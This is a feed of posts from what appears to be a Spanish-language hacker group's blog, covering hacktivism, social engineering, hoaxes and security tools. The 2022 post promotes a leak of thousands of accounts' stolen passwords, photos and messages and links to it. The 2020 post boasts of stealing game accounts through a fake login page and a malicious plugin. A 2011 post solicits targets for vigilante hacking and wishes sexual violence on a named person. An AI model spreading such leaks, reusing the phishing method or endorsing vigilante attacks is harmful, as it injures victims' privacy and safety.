Hacking Blog

Hackeo Masivo a cuentas sociales que compartieron video del hijo de Molusco

noreply@blogger.com (H4x0r Security Group) — Sun, 15 May 2022 20:11:00 -0700

El internet es un lugar bien peligroso te puede dar fama, te puede dar estatus puede transformar toda tu vida pero de esa misma manera puede destruirla.

Nosotros por muchisimos anos hemos sido enfaticos en cuestion de lo que es el tema de la seguridad informatica y tambien lo que es el hacking etico como protesta o como simplemente arma para los menos afortunados.

En el dia de ayer Domingo 12 de Mayo del 2022 al parecer un video del hijo de el conocido locutor e influencer Jorge Pabon alias el Molusco se viralizo en las redes sociales y no por algun contenido positivo si no de manera negativa por que al parecer el video es de ese nino (tome encuenta la palabra que usamos nino) se encuentra haciendo actos sexuales (no tenemos conocimiento la indole de los mismos) pero es segun comentarios de las personas.

El Molusco que no es una persona muy querida que digamos en el sector mas conservador y por nosotros tampoco por una decada a creado su plataforma a raiz de robar contenido de otras personas, memes, videos sin poner credito cosa que en los ultimos tiempos a cambiado un poco, tambien exponiendo bochinches, mofandose etc ya los que sabemos, sabemos.

Ahora bien no sabemos por las circuntancias por las cuales este supuesto video se viralizo, ni por donde si fue por redes sociales o si fue enviado por texto la cuestion y el asunto es que en las redes sociales a raiz de esto la etica es algo que tomamos como primoridal en estos asuntos.

Estamos de acuerdo en algo Molusco es una persona que da asco, a contar de conseguir views y visitas en su plataforma no le importa nada, a veces se escuda del entretenimiento compartiendo cosas que no tienen que ver nada con el mismo.

Pero ver adultos Madres, Padres que tienen hijos e hijas pedir donde conseguir un video, compartir, visualizar y exponer el mismo es algo que simplemente es inaceptable, ellos no tienen idea de lo que estan haciendo simplemente lanzandose en ese odio, y morbo de lo que son las redes sociales sin medir las consecuencias de un delito, pero nosotros no bregamos con la ley, pero si condenamos esto.

Aqui la ley

A raiz de lo mismo en las redes sociales grupos de hackers crearon un video falso con un script automatizado que lanza diferentes tipos de ataques en los que el usuario si queria ver supuestamente el video (que en realidad no era el video) tendrian que poner sus datos de redes, en el caso que el usuario no diera los datos tendrian que instalar un certificados a los usuarios de Iphone.

El resultado miles de cuentas fueron vulneradas con este metodo y mucha sde ellas como era esperarse tenian el mismo password para sus iclouds, etc todo el contenido de estas cuentas fue subido a la deep web y proximamente al parecer sera diseminado en diferentes clusters para exponer a estas personas.

aqui compartiremos lo enlaces de estas cuentas (miles de cuentas fueron hackeadas con su contenido passwords, fotos, videos de esas personas, mensajes absolutamente todo) se creo un video falso y estas personas lo compartieron pensando que obtendrian el video pero lo que ocurrio fue nada en el momento que le dieorn play fueron hackeados ahora para obtener mas info pueden entrar a las direcciones .ONION de

https://bit.ly/3MuQu3O

Ya saben usando el motor de busqueda de TOR y/o deep web las cuentas tambien seran compartidas en el internet normal, reiteramos por el comunicado de Ilussion, SHT, y HS (grupos de hackers) que no se tolerara nada de este tipo de contenido tomando en cuenta que el molusco es un tipo que no es gusto de nosotros pero esta lejos de arremeter contra un menor de edad.

Si le pasara algo malo a ese nino es responsabilidad de ustedes (nada le pasara tiene un excelente padre) pero ustedes son responsables!

pondremos mas informacion mientras se vaya desarrollando esto.

Salu2

La ingieneria Social la arma mas letal en el hacking.

noreply@blogger.com (H4x0r Security Group) — Sun, 30 Aug 2020 13:45:00 -0700

Por muchos años siempre en los fotos es la misma pregunta o la misma sugerencia como hackeo la cuenta de mi novio de facebook? Como me hago de la cuenta de mi amigo en "este juego?" steam?\, mail etc. siempre es la misma pregunta no?

Y siempre es la misma respuesta; Inc. Social por que no hay parche para la estupidez humana, a medida que pasa el tiempo los protocolos de seguridad de las grandes empresas siguen aumentando y así mismo la comunidad de hacking buscan nuevas estrategias para explotar vulnerabilidades, Tokens, Pswd, Cookies esos vectores de ataque conllevan mucho tiempo y empleo y muchas veces puede ser virtualmente "imposible".

Pero que hay del factor humano? Por naturaleza el humano puede ser dos cosas, o muy descuidado o cuidadoso pero en todo caso siempre hay espacio para un fallo de lógica, la Ingeniería social toma por ventaja y se aprovecha de esa vulnerabilidad la vulnerabilidad humana.

El malware como ramsomware sigue constituyendo el 49% de los vectores de ataques a diferentes empresas, mientras la ing social esta a un 25% pero por que es mas preocupante ?

Es lógica humana, digamos que entras en una comunidad de juegos de videos (móviles) quieres sacar dinero vendiendo cuentas de usuarios que estén en alto rango y hayan invertido en sus cuentas mucho dinero, usas tu grupo de atacantes que se infiltren en el clan, grupo, team o comunidad.

Ya una vez dentro obtener información de cada una de las víctimas resulta fácil, la manera de inspirar confianza es dándole un poco de tu TU, real de esa manera te ven como uno de ellos, una vez obtienes su ID, EMAIL, o método de identificación comienza la magia.

Identificar al mas débil del grupo a estas altura te resultara fácil puedes probarlo, compartes un mail, un teléfono algo en donde se puedan comunicar contigo de manera mas personal, al darles confianza bajan la guardia.

Nuestro grupo efectuó un ataque con efectividad de prueba hace 3 semanas donde infiltramos varios clanes de un popular juego de vídeo, en el mismo creemos perfiles (usamos 8 cuentas) con nuestros miembros reales.

Al principio en uno de los grupos hubo dudas pero una vez establecimos contacto fueron ablandando un poco en un termino de 3 días los lideres del grupo ya se sentían en confianza y con teléfonos personales compartidos fue muy fácil utilizar nuestros vectores de ataques ,

PHISHING, creamos una pagina de autentificaron del popular juego en las que la víctima entraba sus datos del juego, una vez ahí adentro se le presentaba un dashboard en donde una de las alternativas era instalar este "plugin" todo con el permiso del usuario 😂 cuando instalaban el plugin teníamos acceso a todo sobre el mismo.

Ya que el usuario mismo (víctima) otorgaba todos los permisos sin darse de cuenta en menos de 30 segundos la cuenta era de nuestro poder y el usuario pasaba sin darse de cuenta.

La ing social sin duda alguna es la arma mas letal en el hacking

Muchas veces conseguir cosas es tan fácil como pedirlas con educación. Por eso es muy instructivo –y a la vez divertido– escuchar de boca del propio Kevin Mitnick, uno de los hackers más famosos de todos los tiempos, cómo usó la ingeniería social para hacerse con el código fuente del Motorola MicroTAC que era «como el iPhone X de la época». Estamos remontándonos a 1992 y todo era un poco diferente.

Siendo entonces un fugitivo de la justicia –había sido atraído un poco por el Lado Oscuro– Mitnick llamó directamente al servicio de información telefónica para pedir el número de las oficinas de Motorola. Pidió amablemente que le pasaran con el jefe de producto del MicroTAC.

La burocracia de las grandes empresas es como es, de modo que esa llamada le hizo saltar por siete u ocho personas intermedias, mientras aprendía qué departamentos había y algo sobre cómo trabajaban, hasta que llegó a un vicepresidente de la compañía, quien le dio el nombre y extensión de la jefa de producto en cuestión. Casualmente estaba de vacaciones pero había dejado el nombre de otra compañera de trabajo en el mensaje grabado, así que con mucha paciencia Mitnick siguió llamando hasta que logró hablar con ella para pedirle el código. «¿Qué versión quieres?» le dijo. «La última y la mejor» fue su respuesta.

Como en toda buena historia, nuestro héroe está a punto de fracasar en tan rocambolesco camino. Pero el hecho de que hubiera cientos de directorios con cientos de ficheros no fue un impedimento (enseñó a su interlocutora a usar TAR para comprimirlo todo en un archivo de 5 MB). Ni tampoco que el FTP donde le pidió que lo subiera estuviera fuera de la red de Motorola y no funcionara: la buena mujer se levantó para hablar con el responsable de seguridad y volvió con su nombre de usuario y contraseña para dárselo a Mitnick. Desde ese momento todo fue mucho más fácil. (fuente)

Despues de esto espero que tomen en cuenta que la seguridad informatica no la dependan de software o de sus passwords supuestamente seguros la intuicion humana es lo mas importante .

Comunidad hacker en cuanto Ricky Rosello

noreply@blogger.com (H4x0r Security Group) — Mon, 22 Jul 2019 19:24:00 -0700

Chad Gray (Traducido)

Nuestra comunidad (al menos esta existe desde el 2005) con grandes que si leen a traves de nuestro blog sabran quienes son de nuestra escena y queremos darle este anuncio

Ya como se ha visto en los todos los medios internacionales, el pueblo de Puerto Rico se ha levantado contra el dictador Ricardo Rosello (gobernador de Puerto Rico) para hacerles un breve resumen el Sr. Ricardo Rosello es el gobernador de Puerto Rico que en las pasadas semanas a sido objeto de escrutinio publico por las ya notorias 900+ paginas de chat privado de telegram y por los arrestos de altos funcionarios cercanos al corrupto gobernador por los federales que incluian a la pasada secretaria de educacion de Puerto Rico.

Pero aquí no venimos a hablar del mierdero que formo este gobernador aquí puedes ver un resumen, lo que si vamos a hacer es pronunciarnos en cuanto a la situación que atraviesa el país y reiterar que nosotros la comunidad hacker de latino América te queremos fuera #rickyrenuncia es el hashtag pero no solo reiterar que queremos fuera al asqueroso cerdo Ricardo Rosello (gobernador de Puerto Rico) todos los políticos corruptos de Puerto Rico, ESTAMOS PENDIENTES A TODOS.

Sus comunicaciones no estarán a salvo si levantan el verdadero poder de este mundo, la situación es de preocuparse por que estas personas son los que se encargan de salva guardar la salud, la educación, la economía, el bienestar, la emoción todo de un pueblo y la idea de un gobierno DEMOCRÁTICO es trabajar por el pueblo y no por el interés de los millonarios.

Nosotros nos ponemos a disposición de los que sean en investigar, en extraer información de maneras legales hacer investigación forense, TELEGRAM es una aplicación de comunicación que todos ya sabemos como se usa, pero confiar que estos asquerosos usaran y entregaran sus celulares a un equipo de IT que son faltos en conocimientos y no solo eso nombrados por ellos mismos, DEBE SER IMPORTANTE QUE QUIENES DISPONGAN DE LOS DISPOSITIVOS SEAN EXTERNOS DEL GOBIERNO.

Por ende la COMUNIDAD HACKER DE LATINOAMERICA, el equipo de H4xxor security estamos pronunciándonos a favor del pueblo de Puerto Rico si necesitan asesoría pueden enviarnos un mail a blood_rec@el-hacker.org

Y a todos esos políticos sin escrúpulos y asquerosos estamos pendientes de ustedes no tenemos miedo y ya nos levantaron nuestra curiosidad, ustedes no tienen apenas la decencia de tener seguridad óptima en sus servidores, en sus dispositivos y se atreven joder con el bienestar del pueblo.

Sin mas pre ambulo nosotros estamos al pendiente y estaremos silente pero créame que esta vez no se saldrán con la suya

La comunidad hacker de latino america no te quieren gobernador #RickyRenuncia

Como Inicio en el tema Del Hacking?

noreply@blogger.com (H4x0r Security Group) — Sat, 23 Jun 2012 16:49:00 -0700

Uff cuantas veces vemos esta pregunta?
o cuantas veces un usuario piensa en eso.
al no conocer ninguna respuesta se enfrascan a descargar 200 manuales de hacking
cual es el problema de esto?
bueno van al area de troyanos y descargan un manual de como configurar un server o un troyano etc, van al area de bugs y exploits y descargan un manual de como buscar Dorks en google e ir a la pagina de www.explo.it y ejecutar scripts de exploits, van al area de hacking newbie, y descargan un manual de como usar un keylogger

Ven algo incorrecto en esto?
Si , la palabra hacking como vengo mencionando hace mucho se a divercificado demasiado inclusive el termino se le ha dado "equivocado" que ahora cualquier cosa la consideran como hacking ahora si miramos desde los principios del hacking, todo iba orientado a la programacion y busca de fallos en la programacion etc.

ahora viene "ful4n0x_d3t4l" y programa un troyano en vb y lo pone publico a descarga y n0ob.xs4ibot_h4cker lo descarga y "piensa" que va por el camino del hacking...

no es asi detente <-
que podemos considerar como hacking en estos tiempos y sus ramas segun los estereotipos de los actuales foros?

Hacking wireless
Hacking web o Defaces
Redes
Intrusion en sistemas
Con Software
troyanos , keylogger etc etc.

Usualmente es la estructura de un foro actual sobre el hacking, pero dentro de esa estructura, acostumbramos a confundir al usuario nuevo a tener malas costumbres olvidandonos del principio de todo (inclusive yo) cuando moderaba algunos foros cai en esa "Mala Costumbre".

Les educamos a los usuarios a bajar miles de programas y como usarlos y como mencione arriba, nos olvidamos del principio basico del arte del verdadero hacking

La Programacion
En tiempos remotos el o sigue siendo el paraiso de los hackers el MIT de la ciudad de Boston, se hacian investigaciones cuanticas , y mas aun el ARPANET , dieron origenes a los Autenticos Programadores, pero no voy a entrar en la teoria , en el MIT obtuvieron la primera computadora para "jugar" para el 1961, de ahi salieron los 1ros Hackers , pero en resumen que nos muestra esto que el principio de los principios es la Programacion

Entonces lo que sugiero nuevamente es retomar ese camino, claro esta que los tiempos han cambiado y que cada vez la vida se simplifica mas aun, pero el problema que en este mundo extenso de la Informatica necesitamos mas Programadores IE HACKERS,.

contamos con mentes que quieren crear pero seguimos cayendo en lo de mostrarle a los usuarios como usar x-d programa , sin mostrarle la posibilidad de como se hizo x-d programa.

a la simple pregunta y en resumidas cuentas TU amigo que te inicias en este mundo del hacking cuando te Preguntes

Como me inicio en el Hacking?
La respuesta es sencilla..... Con la Programacion, que lenguajes aprenderas de tantos que hay? no se es decision suya, la primera actitud que debes adoptar para adentrarte es ser AUTODIDACTA Y pensar por si mismo no por lo que te imponga el Usuario "Avanzado" o un moderador de foro.

Ejemplos que podrias usar seria
C++
Java
Perl
Ruby
Python

Pero con uno de ellos comenzar (Javascript) es buena idea si te vas por lo de el hacking web, pero al menos conocer principios Basicos y cosas de ellos pero a la respuesta

De Como Iniciarce en el Hacking , Venimos Con la Programacion

UN Programa no te muestra a como ser Hacker, Una consulta y 300 LIneas de Codigos Si

Buenas Noches

Anonymous Desmiente Ataque En facebook. Un Hoax

noreply@blogger.com (H4x0r Security Group) — Sat, 13 Aug 2011 10:59:00 -0700

algo que a traido un poco de confusion los ultimos dias y a medida que se acerca el 5 de noviembre la pregunta entre los ./Geeks ./Expertos En seguridad ./Hackers ./Usuarios en general.

Anonymous No Atacara a Facebook.

Segun fuentes o Alguna informacion que se filtro en la red y un video asegura que Facebook viola las politicas de privacidad de los usuarios (cosa que es verdad) y que ellos venden su iformacion a agencias privadas sin el consentimiento de sus usuarios (otra cosa real) aqui el supuesto video:

Video

Ok ahora la informacion o la gente (incluyendome) pensaron wow! Anonymous va a hacer un gran ataque a Facebook, y yo con mi mente tan aventurera me dije ok atacaran a facebook como un Ddos? un defacement, una escalda de privilegios, un stack en los softwares que manejan el gigante social.

en mi mente vinieron muchos servidores, que manejan a otros servidores (que operan como terminales) y se conectan a otros servidores que a su vez conectan con otros.

Suena algo gigantezco no? si lo es . y empeze a imaginarme un Ddos en contra de esos servidores que manejan a otros servidores y que se conectan a otros servidores, sin contar los firewalls, pots, y protocolos de seguridad.

y rapido mi mente en solo 10 minutos estaba botando ya humo, empeze a pensar ok si anonymous es anonimo por que esta info esta tan filtrada en la red y de donde viene este video, si el grupo anonymous no es un simple grupo de "hackers" si no somos todos.

Curiosamente el video original fue borrado de youtube asi como el usuario que lo subio, y pues me di la tarea de buscar por que me parece una Operacion muy grande a llevarse a cabo y fue suficiente para saber que rapidamente como aparecio la info rapido la desmintieron.

AnonymouSabu dijo en su cuenta de facebook:

anonymouSabu The Real Sabu

Thank you to my brothers at @anonops and @anonyOpsIndo for exposing the fact that #opFacebook is bullshit and does not exist.

10 Aug

o sea desmentido el ataque y como posteo en su cuenta de twitter AnonOps

TO PRESS: MEDIAS OF THE WORLD... STOP LYING! #OpFacebook is just ANOTHER FAKE! WE DONT "KILL" THE MESSENGER. THAT'S NOT OUR STYLE #Anonymous

9 Aug via web

y

Dont be silly. Important things are happening in the world to deal with quirks like #OpFacebook. Lets keep our style & moral #Anonymous

ok entonces quien es este grupo que aseguran que "Atacaran" a facebook el 5 de noviembre? un grupo que no necesariamente sea de Anonymous oficial pero pues son Anonimos, la noticia o Hoax a llegado ser tan desconcertante que en el site de Geohot un site que ofrecen jailbreaks y cosas pusieron la manera de "supuestamente" protegerte del "supuesto" ataque ;

Como Protegerte del Ataque del 5 de Noviembre clickea aqui.

jajajaja tipico

ok continuemos esta es la supuesta pagina de los que originaron toda esta Vendeta

Sitio Oficial de OperacionFacebook Click

Cuenta de Twitter .

y Un chat para que se comuniquen los usuarios jajaja Click aqui .

un post de ellos y pueden ver las fechas jajaja miren;

Anonymous: #Op Face.Book
Time is coming, who is ready to do this?

25 de mayo a las 8:40 · ·

lol bueno gente tal ataque no ocurrira solo es un simple hoax de alguien que quiere atencion, aunque siempre es bueno mantener sus cuentas protegidas con la mayor privacidad posible etc. pero no ocurrira tal ataque solo imaginen la estructura de facebook ser atacada.

estamos hablando de 50,000 servidores Linux, centro de datos (Data centers) como cuartos de refrigeracion cada uno con su protocolo interno de seguridad individual, tanto fisico, como remoto, potentes prosesadores AMD por cierto. o sea hablamos tambien de mas de 2,000 servidores Mysql, y servidores de mejoras de memoria o sea la infraestructura de los servidores es una res super compleja.

se me hace dificil pensar que bajarian "FACEBOOK" con Ddos en fin esperemos que esta guerra sea un hoax.

Las luchas de Anon son contra las empresas que abusan de su poder aunque facebook lo hace, y el gobierno.

Buenas Tardes jajajajajajaja

_Bryant

Hacker Boricua Retomando acciones en contra de la pedofilia a nivel Isla

noreply@blogger.com (H4x0r Security Group) — Mon, 13 Jun 2011 17:08:00 -0700

Bueno hace tiempo el hacktivismo se habia caido aqui en Puerto Rico la verdad que no muchos tomaban las actividades ya que tenemos vidas sociales (reales).

Ok todo este tiempo que estubimos offline veia al menos mensualmente noticias de como los pedofilos viajan hacia la isla, y algunas actividades inusuales.

Jay Fonseca Publico en su sitio web una reaccion hacia el arresto de Alexis D. Negron Cruz su web master del sitio web www.jayfonseca.com alegadamente arrestado por cargos de pedofilia y estupideces de idiotas que no tienen cabezas.

es evidente que una vez el F.B.I arresta a alguien es por que ya habia una investigacion o sea en otras palabras y en resumen el tipo es un puerco, cerdo que no merece vivir.

Pero aqui en h4xxor security no nos importa el F.B.I ni tampoco menos quien es Jay Fonseca y Mucho menos Alexis D.Negron Cruz (Pedofilo Que deberia ser Violado 2,000 VECES) xD, pues decidimos abrir nuevamente nuestro Movimiento en contra de la pedofilia.

esta vez sera un poco diferente antes habiamos habilitado un correo para que nos reportaran sitios webs etc de las actividades de estos cerdos humano pero esta vez el correo se habilitara para solamente reportar emails de estos individuos nosotros nos encargaremos de que hacer con ellos.

este blog no se solidariza con la divulgacion de informacion a las autoridades ya que es falta de etica y obviamente por que las autoridades no hacen nada asiq ue es mejor que nosotros mismos nos encarguemos de atacar a estos sitios.

hunting.pedos@hotmail.com en este email podran enviar emails de estas lacras que sepan que son emails de estas lacras o sea investigar casos etc, eso incluye perfiles de facebook (que hay muchos) o twitter.

Estamos trabajando en un sitio web que subiremos y lo estaremos monitoreando para afiliarlo con agencias que se dedican a lo mismo asi como grupo de hackers que se quieran unir a esta causa que aun es dificil acabar con ellos pero unidos se puede...

si otros grupos de hackers o entusiastas a la informatica se quieren unir simplemente dejenmelo saber pueden enviar un email a la cuenta dada o seguir actualizaciones por twitter el sitio web esperamos subirlo para este mismo viernes!!

hunting.pedos@hotmail.com

y un Mensaje a Jay Fonseca sabemos que no tienes culpa de las personas que estan extentas de tu capacidad mental para administrar un sitio web o algo pero una vez una lacra de estas es cachada con las manos en la masa es si o si haci que gordito cabron, no le de beneficio de duda pedazo de pendejo!!! :-]

salu2

El clickjacking en Facebook de Nuevo en moda

noreply@blogger.com (H4x0r Security Group) — Thu, 2 Jun 2011 14:24:00 -0700

Bueno uff que tanto tiempo sin darme la vuelta por aca es que mi vida real cada vez se ocupa mas de mi vida cibernetica,.

Pues despues de tanto tiempo me doy la vueltita por aca usualmente me la paso en facebook, compartiendo con mis amistades, con mi familia etc lo usual de una persona comun y corriente. pero a la vez como entusiasta de la informatica me he dado de cuenta que se a puesto de moda el clickjacking Una tecnica usada por hackers o como le quieran llamar para hacerce de cuentas de emails, passwords e informacion personal del usuario Victima xD.

Entonces que es el Susodicho Clickjacking?

Vamos a poner la definicion para el usuario normal, y para los mas experimentado es tan sencillo que es el secuestro de clicks -> o_0 secuestro de click? si a veces la pasamos en facebook y vemos estos videitos que dicen por ejemplo " Padre atrapa a su hija teniendo Sexo con 20 " o Miren como asesinan a esta muchacha por tener un amamente en facebook" etc etc etc lo que hace el clickjacking es ocultar un boton sobre otro boton ... o_0

queeeeeee? si detras de este boton que le das con tu click existe un pequeño script que puede instalar aplicaciones no deseadas en tu computadora u/o ordenador como keyloggers ( para robar lo que tecleas ) etc .

y lo que se esta haciendo de mas moda es el modo de clickjacking que redirigen a otra pagina que de alguna manera u otra te pide acceso a tu cuenta de facebook o twitter ( una tecnica un poco lamosa) dado que la idea de hacer clickjacking es que no tengas que pedirle nada a la victima.. que sea automatizado. osea una especie de clickjacking/phishing.

Y entonces como se protegen es tan sencillo como descargar el plugin para firefox (No Script) con este plugin funciona bloqueando los scripts no deseados, o clickeadas o burradas que hagas para que no vayas de conquistador clickeando cada estupidez que ves por facebook aplica para twitter tambien xD..

asi que la proxima vez amigos no anden de locos creyendose todo lo que ven en facebook.. en fin estoy preparando un sandbox ahora mismo para mostrarle unos buenos ejemplos de clickjacking en tiempo real..

Para Descargar Firefox Aqui
Para Descargar el Plugin de Firefox No Script Aqui

despues de tanto tiempo xD

noreply@blogger.com (H4x0r Security Group) — Mon, 3 Jan 2011 12:49:00 -0800

Bueno de muchas cosas me e perdido este tiempo? (no tento) estube una larga temporada inactivo y la verdad es que si entraba por aqui miraba el blog y me daba mucha weba postear algo inventarme algo..

estube mucho tiempo con mi familia disfrutando de mis hijos y mi esposa (la mejor parte ^_^) y realmente pues como muchos cumpliendo con mis deberes sociales/militares/ociosos...

la realidad que pues despues de estructurar mi tiempo un poco para dedicarme a todo pues decidi regresar por aqui.

despues de estar las ultimas 2 semanas leyendo blogs,foros,comunidades, paginas webs a ver que es lo que esta pasando en la escena y ponerme al dia pues saque una conclusion..

Nada realmente cambia, con la unica diferencia que ahora los niños aprenden a usar un script de explo.it y se creen los mega huaxxxx000rsss xD.

y como que hay muchos des aires de grandeza, antes pues al menos tenian un poco de mas conocimientos, al menos antes los que tenian esos aires de megahuax0r xn80_x112 tenian algunos comocimientos.

pero ahora vemos muchos creiditos con scripts pre-fabricados creyendoselas de mierdas (cosa que no se equivocan)

pero saben que son mierdatos.

en fin mi gente por aca estamos hay que poner la escena de nuevo como estaba hace 5 años atras.

espero que todos hayan tenido un excelente año que paso y que este proximo sea mucho mejor los quiere mucho

Bryant

H4x0r Security Censura a Adrian Lamo {Banned}

noreply@blogger.com (H4x0r Security Group) — Fri, 30 Jul 2010 21:36:00 -0700

Bueno a la hora de criticar sea al gobierno, sea a cualquier ciudadano lo hago objetivamente ya que creo en la libertad de expresion etc etc...

Pero esta vez vengo a presentar mi censura hacia el "Ex-Hacker" Adrian Lamo, Por el lio ultimamente de Wikileaks y la filtracion de Informacion del gobierno Estadounidense y Los Militares en operaciones en Afganistan E Iraq.

Como ya saben y es un hecho yo soy un Patriota que defiendo mi bandera hasta lo ultimo soy un soldado norteamericano Que Creo en Mi Constitucion etc...pero una cosa que no tolero son los abusos.

1ro el gobierno americano (mi gobierno) tiene arrestado a este joven a quien consideran una amenaza para la seguridad nacional por la divulgacion de dichos documentos.

en parte de los videos Bradley Manning Filtro el famoso video en el que se ve como soldados americanos asesinan a dos (2) Periodistas de Reuters por que hubo una supuesta confusion de identificacion (asi se le llama en el campo de batalla) y pensaron que los 2 Periodistas portaban un Rifle A-k47 y Un Lanzagranadas O R.PG por sus siglas en ingles.

Pero esta vez no se trata de esto esta publicacion se trata de Mi Descontento y Mi Censura hacia el "Ex-Hacker" Adrian Lamo quien como ya saben sus intrusiones a microsoft,Yahoo al New York Times y ahora es tipo es un "Periodista" de 3ra lo lanzaron al ojo publico.

Este "Ex-Hacker" ahora es un periodista de 3ra y se autoconsidera un heroe, Por que se considera un heroe? Por que con todo este lio que a explotado con la divulgacion de los videos en Wikileaks el "Ex-Hacker" Adrian Lamo Revelo Su fuente de noticias..

En otras Palabras El "Ex-Hacker" Y "Periodista" Adrian Lamo Choteo como decimos vulgarmente en la calle al heroe de guerra Bradley Manning de que Manning era el que estaba divulgando la informacion y este mismo (Adrian Lamo) LLamo al F.B.I Y las agencias del gobierno para decirle que el soldado era el que hacia esto..

Adrian Lamo, yo soy una persona que siempre e dicho que la etica hacker no existe en estos tiempos pero viniendo de esta persona (Adrian Lamo) Un "Hacker de Sombrero Gris" al menos la etica siempre debe estar presente en tu corazon.

La Primera Regla u Comportamiento de un hacker y que siempre defenderemos es :
"La Informacion Siempre se Debe Compartir Libremente"

En otras palabras si yo se de alguna manera como liberar el codigo fuente del super mega sistema operativo Windows 7 yo la comparto libremente, en este caso este joven mostro al mundo el vil asesinato de 2 reporteros asi como algunos civiles iraquies en manos de mi gobierno americano.

Entonces dejastes que la informacion fuera revelada y luego lo delatas a las autoridades, Cuando una persona en el ejercito o un gobierno es General siempre se le llamara General Asi como el presidente americano no importa si dejo su presidencia siempre seguira siendo presidente.

Usted Adrian Lamo seguira siendo un hacker. pero como Hacker a violado una de las cosas u reglamentos que al menos como entusiastas de la informatica siempre tratamos de proteger y es protegernos entre nosotros mismos nunca exponer a nuestros colegas ni mucho menos sacarte provecho por medio de otro entusiasta informatico.

La comunidad Hacker dia a dia sigue creciendo muchos caen y muchos vienen pero siempre tratamos de mantener intacto nuestro codigo de honor como Didacticos de la informatica.

Lo que a hecho este hombre Adrian Lamo, es insulto para la comunidad Hacker Exponiendo la libertad de este joven soldado (Choteandolo) o entregandolo a las autoridades y yo como entusiasta a la informatica te censuro.

A nuestros lectores si creen que estoy equivocado con mis comentarios pues les pido mis disculpas pero realmente me parece un descaro de este hombre (Adrian Lamo) en delatar a este joven, cuando el fue un Hacker en el pasado y deberia seguir con todas sus eticas y cumplirlas honorablemente.

Adrian Lamo You Has Been Turned Into A Non-Grata "Hacker"

Espero que a los seguidores de este "ex-Hacker" les moleste mi descontento y a los que esten deacuerdos pues son bienvenidos sus comentarios

Nuevo Codigo de ataque de Firefox se Hace Publico

noreply@blogger.com (H4x0r Security Group) — Fri, 19 Feb 2010 16:07:00 -0800

Un experto de seguridad informatica a hecho publico un nuevo codigo de ataque que afecta el nuevo navegador de firefox o mas bien su version mas reciente.

El Exploit permite que se ejecute remotamente codigo malicioso en la maquina afectada, asi informo Evgeny Legerov (Un Tipo Ruso) xD. quien es fundador de la version rusa de intevydis, que para los que siguen este sitio son analistas en seguridad informatica y busqueda de vulnerabilidades, el mismo programo un nuevo modulo para immunity canvas que es un software de pago para los administradores web o de redes.

Fue probado por los mismos en Windows Xp y Windows Vista., estamos hablando la version 3.6 del navegador (Firefox),

este descubrimiento viene despues que los desarrolladores de Mozilla habian sacado la actualizacion debido a 3 vulnerabilidades y una de ellas involucraban otro desbordamiento pero no el mismo, en este.

Mozilla rapidamente (como era de esperarse) rapidamente ripostaron informando que toman las cuestiones de seguridad bn en srio y que exortaban a los analistas (hackers) a trabajar reportando estas fallas de seguridad para brindar un mejor servicio (si claro) jajaja.

Para mas info sobre el exploit clickeen aqui.

GreenSQL – Firewall Software

noreply@blogger.com (H4x0r Security Group) — Sun, 14 Feb 2010 11:31:00 -0800

GreenSQL es un servidor de seguridad de codigo abierto utilizado para proteger las bases de datos de ataques de inyección SQL. GreenSQL funciona como un proxy para comandos SQL y tiene soporte para MySQL y PostgreSQL. La lógica se basa en la evaluación de los comandos SQL usando una matriz de valoración del riesgo, así como el bloqueo de conocidos comandos de DB administrativa (DROP, CREATE, etc.) GreenSQL se distribuye bajo la licencia GPL.

GreenSQL Arquitectura

GreenSQL funciona como un proxy inverso para las conexiones de MySQL. Esto significa, que en lugar de conectar al servidor MySQL, las aplicaciones se conectará al servidor de GreenSQL. GreenSQL analizará las consultas SQL y, a continuación, si están a salvo, se remitirá a la parte final del servidor MySQL.

Nuevos Cambios

En esta versión, GreenSQL proporciona soporte nativo para PostgreSQL (http://www.postgresql.org) bases de datos para la primera vez. De hecho, GreenSQL es el servidor de seguridad de base de datos única (Open Source o cerrado) disponibles para la protección de las bases de datos PostgreSQL muchos actualmente en uso.

GreenSQL 1,2 combina la GreenSQL paquete de consola en el GreenSQL-FW. El GreenSQL-consola ya no será lanzado como un paquete separado. Durante el proceso de instalación, usted podrá elegir si desea o no instalar la consola.

Usted puede descargar GreenSQL v1.2 aquí: Click Aqui.

O Leer Mas Sobre el Software Aqui.

Dandome la vuelta por ahi todavia Bryant is Back!!!!

noreply@blogger.com (H4x0r Security Group) — Thu, 14 Jan 2010 08:59:00 -0800

estoy por ahi y disculpenme mi poca actividad estoy de vuelta ya definitivo jajajaja en fin saludos a mis amigos y mis enemigos....

En La Jungla interesante herramienta para visualizar procesos(Process Hacker v1.7)

noreply@blogger.com (H4x0r Security Group) — Fri, 18 Dec 2009 13:07:00 -0800

Buscando por ahi e encontrado una herramienta interesante se trata de Process Hacker que es una herramienta de codigo abierto para visualizar procesos. y editor de memoria, con muy buenas caracteristicas.

si llegastes a este post y te interesa la herramienta asumo que ya debes tener conocimientos de hacking al menos intermedios para usar la herramienta aunque realmente no nesesitas ser un mega juanker..hahaha.

Trabaja muy similar que el visor de procesos normal de tu sistema operativo lo unico que este sera de manera maligna.

Muy buenas caracteristicas:

Visualiza,Suspende y Resume Procesos
Reinicia Procesos Creando Archivos "Dump" Que Pueden ser editables en un debugger hasta puedes hacer inyecciones DLL'S dandote posibilidades de usar Dll's malignas/ . Puedes visualizar informacion detallada de cada proceso,estadisticas y su funcionamiento
y muchicimas cosas mas...

Requerimientos son los tipicos de WONDOWS XD EDITION O WONDOWS VOSTA cugh cugh quise decir windows...

.NET Framework 2.0
Microsoft Windows XP SP2 or above, 32-bit or 64-bit

Para descargarlo hazlo desde Aqui :

y lea mas Aca.

salu2

[EXPLO.IT] Archivo de exploits

noreply@blogger.com (H4x0r Security Group) — Mon, 23 Nov 2009 08:11:00 -0800

No es tan nuevo que digamos y asi mismo estan en estado de pruebas pero nuestros amigos de Remote Exploit han rescatado el trabajo de str0ke que a ciencia cierta no se sabe que realmente paso con el si de verdad murio o se trato de una broma pesada lo que si es real es que el dominio de milw0rm permanece inerte.

bueno el grupo de Remote Exploit, precisamente los desarrolladores de Ofensive Security, han continuedo con la linea del proyecto que milw0rm habia dejado atras (str0ke) , esta vez con el dominio de explo.it es una pagina un tanto similar a lo que era milw0rm, la diferencia es que ahora los usuarios tendran la ventaja de descarar las aplicaciones vulnerables si estan disponibles.

el caso es que si la aplicacion vulnerable es [ Home FTP Server 'MKD' Command Directory Traversal Vulnerability] Pueden descargar el archivo vulnerable para propositos de testing en el directorio que es marcado con la letra A para descargar o sea se lista las aplicaciones vulnerables y si tiene la letra que indique arriba podran descargar la aplicacion.

